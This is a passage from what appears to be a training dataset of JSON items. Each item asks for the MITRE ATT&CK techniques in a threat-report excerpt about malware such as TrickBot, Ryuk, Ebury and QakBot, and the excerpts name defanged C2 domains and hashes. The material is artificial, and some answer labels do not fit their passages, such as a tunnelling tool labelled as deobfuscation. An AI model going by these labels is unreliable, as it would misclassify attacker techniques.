organizations within the United Arab Emirates, Saudi Arabia, Israel, and Azerbaijan. The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method\n- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the \u2018-p\u2019 parameter has been passed into the command line, the loader proceeds to download the Team9 backdoor directly from the command and control server. One notable addition is the process injection (hollow process injection) when the backdoor has been successfully downloaded and decrypted. The loader injects the backdoor to one of the following processes", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1055.013: Process Injection - Process Doppelg\u00e4nging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method\n- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network. These observations come from system log data, CrowdStrike Falcon\u00ae sensor telemetry, and the output of the Falcon Forensic Collector (a customized version of CrowdStrike\u2019s freely distributed community tool, CrowdResponse", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.001: OS Credential Dumping - LSASS Memory\n- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Displays and modifies entries in the Address Resolution Protocol (ARP) cache, which contains one or more tables that are used to store IP addresses and their resolved Ethernet or Token Ring physical addresses. Used without parameters, arp displays help", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KillDisk is designed to run with high privileges, this time it registers itself as a service under Plug-And-Play Support name", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into an internal network and then this tunnel can be used to send and receive data between the C&C server and even non-infected computers in the network. The main idea of this tool is based on the same principles as the XTUNNEL malware used by the Sednit group", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerStallion is a lightweight PowerShell backdoor using Microsoft OneDrive, a storage service in the cloud, as C&C server", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Earth Vetala used spearphishing emails with embedded links to a legitimate file-sharing service to distribute their malicious package", + "output": "- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emails dating more than three years prior to malware execution have been included in the collected EmailStorage folder, meaning that there may not be a date limit for the email enumerator. There is a lack of keywords or other limiting pattern by which specific email messages in local mailboxes were targeted for exfiltration. Kroll has identified instances where specific email messages were deleted within the EmailStorage folder. In some instances, the entire EmailStorage folder is deleted once messages have all been exfiltrated. Based on observed cases, there was no evidence that attachments were included in the collected data. Kroll collaborators at the National Cyber Forensics Training Alliance (NCFTA) observed Qakbot samples sending SMTP traffic indicative of outbound spam thread hijackings", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The experience of dealing with Emotet shows that it will be time well spent. We always recommend that clients adopt a policy that forces users to create passwords that they can remember, but that are hard to guess", + "output": "- T1110.001: Brute Force - Password Guessing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first stage logic is performed by \u2018mklgsecondary\u2019 which serves the purpose of downloading a file named \u2018chrome.txt\u2019 from a C2 server using the BITS utility. The downloader modifies the Chrome shortcut using the same method previously described for the Telegram variant. The downloaded PE file (\u2018chrome.txt\u2019/\u2019mklgchrome\u2019) gets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing the MarkiRAT payload", + "output": "- T1197: BITS Jobs\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup", + "output": "- T1218.010: System Binary Proxy Execution - Regsvr32\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine\u2019s %APPDATA% directory. The built-in Windows utility rundll32.exe is then used to load this DLL by the original .lnk file. Unit 42 has observed a total of two variants of Comnie. One of the ways the variants differ is in how they obtain their command and control (C2) information. Both variants make use of third-party online services in an attempt to prevent DNS based blocking of their first stage communications. In older variants, Comnie was found to look for the \u2018++a++\u2019 markers. The example C2s used by older variants of Comnie demonstrates this", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To inject the OpenSSH server configuration directly into memory, Ebury parses the sshd binary\u2019s code section mapped in the same process looking for two different functions. If it fails, it downgrades security features by disabling SELinux Role-Based Access Control and deactivating PAM modules. When one of the functions is successfully resolved, Ebury will use this when the backdoor is used to tamper with sshd\u2018s configuration", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1556.003: Modify Authentication Process - Pluggable Authentication Modules" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main code is run in a separate thread: every 10 minutes, the application contacts the C&C server motivation[.]neighboring[.]site and passes it the computer's identifier in the User-Agent string. The identifier is a SuperFastHash of the system volume serial number and the name of the computer", + "output": "- T1029: Scheduled Transfer\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One significant change between DEATHRANSOM and FIVEHANDS is the use of a memory-only dropper, which upon execution, expects a command line switch of -key followed by the key value necessary to perform decryption of its payload. The payload is stored and encrypted with AES-128 using an IV of \u201c85471kayecaxaubv\u201d. The decrypted FIVEHANDS payload is immediately executed after decryption. To date, Mandiant has only observed encrypted droppers with a common imphash of 8517cf209c905e801241690648f36a97", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before executing the main payload, the QakBot loader will first test the infected system to see if it is a good candidate for infection. Figure 5 below shows a high-level execution flow of the QakBot loader", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method, uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system\u2019s IP physical address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tracing the origin of the hidden .mina file showed that it is a copy of an included resource, renamed SubMenu.nib, from the application bundle and where the main backdoor functions were contained. It also has the same links to Lazarus\u2019 Windows and Linux predecessors: the presence of the hardcoded strings c_2910.cls and k_3872.cls. Both strings were previously used during C&C communication to the domain thevagabondsatchel[.]com as the sample storage of the cybercriminal group, as reported by 360 Netlab researchers", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor in this case hosted the MSI file on GitHub using a spoofed file extension to look like a PDF", + "output": "- T1218.007: System Binary Proxy Execution - Msiexec" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The most common ports used are, 80, 1985, 1986, and 443. 1985 is the default port for the malware, 1986 is the lazy variation of that port. Port 80 and 443 are the default ports for HTTP and HTTPS traffic. The next most common is port 53. This is used in some of the newer 3.22 and 3.39 samples. After that, the count for each port starts declining sharply", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Then, it encrypts it with 3DES before sending it (figure 28). The _P.Y (\"\"0295A. 1618C\"\") method in figure 26 creates the MD5 hash of the string. This hash is used as secret for the 3DES encryption\"", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Afterwards, the persistence file will be created in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/ folder. This persistence file is also set to hidden with a randomly generated file date and time", + "output": "- T1543.004: Create or Modify System Process - Launch Daemon\n- T1543.001: Create or Modify System Process - Launch Agent" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Extract the encoded payload. Decrypt the extracted payload. This uses the AES algorithm in CBC mode. Decompress the decrypted payload. This uses the LZMA algorithm. Decrypt the decompressed payload. This is simple XOR with byte key and as such does not impact compression ratio. Execute the decrypted payload as shellcode", + "output": "- T1027: Obfuscated Files or Information\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This function will either bind the calling process to a port or has the calling process connect to a remote host. The function is called in the following manner", + "output": "- T1134.002: Access Token Manipulation - Create Process with Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet is one of the most widely distributed and actively developed malware families on the crimeware landscape today. Emotet began purely as a banking trojan, but over the years, has continued to evolve and more recently, has been associated with some larger-scale targeted Ryuk ransomware infections. Emotet is commonly delivered via both macro-laden office documents, as well as URL-based spam messages that lead to an eventual infection. It's not uncommon to see Emotet reuse of some of the command and control (C2) servers over more extended periods. The goal of Emotet, as is the case with crimeware-based threats, is monetary. Attackers use Emotet to deliver modular payloads it can use to monetize infections", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group\u2019s familiarity with Windows network administration", + "output": "- T1007: System Service Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. According to Group-IB researchers, APT41 usually parks their domains for some time at 127.0.0.1 after their campaigns are over. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry. The contents of the file \"\"install.bat\"\" from APT41's This is Not a Test campaign\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and 